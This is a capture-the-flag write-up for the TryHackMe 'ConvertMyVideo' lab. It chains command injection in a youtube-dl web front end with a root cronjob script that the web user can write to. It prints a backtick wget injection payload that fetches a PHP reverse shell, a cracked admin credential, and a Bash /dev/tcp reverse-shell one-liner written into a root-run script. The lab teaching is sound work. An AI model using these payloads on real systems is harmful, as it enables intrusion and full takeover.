TryHackMe - ConvertMyVideo (Medium)
{"author" : ["ret2basic"]}

Summary

Port 80 hosts a "Convert My Video" service, which is a GUI wrapper of youtube-dl. Intercept the request with Burp and analyze it. Here we use command injection to transfer a PHP reverse shell payload to the victim machine and get a user shell as www-data.
In the privilege escalation phase, pspy finds a script gets executed as root every minute or so. Moreover, www-data has write permission on that script. Here we overwrite the script with a Bash reverse shell payload and catch a reverse shell as root.

IP

    RHOST: 10.10.108.142
    LHOST: 10.13.12.2

Nmap

Nmap

Directory Fuzzing

Run Gobuster:
1
gobuster dir -u http://convertmyvideo.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Copied!
Gobuster finds /admin:
Gobuster
http://convertmyvideo.thm/admin prompts a login form but we don't know the credential yet:
/admin

www-data Shell: Command Injection

Use 1337 as input, capture the request and send it to Repeater:
Repeater
Try command injection:
id
It works. Now let's try to transfer a PHP reverse shell payload to the victim machine. Start a HTTP server:
1
updog -p 80
Copied!
Use the following payload to transfer the PHP reverse shell payload:
1
`wget${IFS}http://10.13.12.2/php-reverse-shell.php`
Copied!
Here ${IFS} must be used to represent space, otherwise the syntax of the payload will be interpreted incorrectly. Send this request:
wget
Trigger the payload at http://convertmyvideo.thm/php-reverse-shell.php and catch a reverse shell as www-data:
www-data shell

Another User: Password Cracking

In /var/www/html/admin, we fidn .htaccess and .htpasswd:
/var/www/html/admin
Recall that http://convertmyvideo.thm/admin prompts a login form and we did not know the credential. Here .htaccess and .htpasswd are responsible for this login form. The .htpasswd file contains a password hash and we should try to crack it using John:
1
john htpasswd -w=/usr/share/wordlists/rockyou.txt
Copied!
The credential is itsmeadmin:jessie:
Credential
We won't use this credential though: it is possible to become root from www-data directly.

Privilege Escalation: Cronjob + Weak Permission

Transfer pspy64 to the victim machine. Note that /var/www/html/tmp/clean.sh is executed as root by some cronjob:
pspy64
We (www-data) have write permission on this script:
Write permission
Start a pwncat listener and write Bash reverse shell into /var/www/html/tmp/clean.sh:
1
echo 'bash -i >& /dev/tcp/10.13.12.2/1337 0>&1' > /var/www/html/tmp/clean.sh
Copied!
Catch a reverse shell as root:
root shell
Last modified 2mo ago